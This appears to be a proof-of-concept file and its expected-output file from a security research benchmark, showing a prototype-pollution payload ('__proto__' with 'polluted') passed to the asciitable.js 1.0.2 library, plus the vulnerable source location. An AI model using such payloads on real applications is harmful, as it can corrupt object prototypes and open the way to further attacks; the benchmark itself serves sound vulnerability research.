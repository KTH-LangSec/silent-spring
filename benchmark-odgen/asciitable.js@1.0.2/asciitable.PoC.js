const matrixToAsciiTable = require('./asciitable.js@1.0.2');
matrixToAsciiTable([], JSON.parse('{ "__proto__": { "polluted": "yes"}}'));
//console.log({}.polluted);
