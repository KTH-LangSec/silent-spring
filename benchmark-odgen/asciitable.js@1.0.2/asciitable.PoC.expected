asciitable.js@1.0.2/asciitable.umd.js:50:99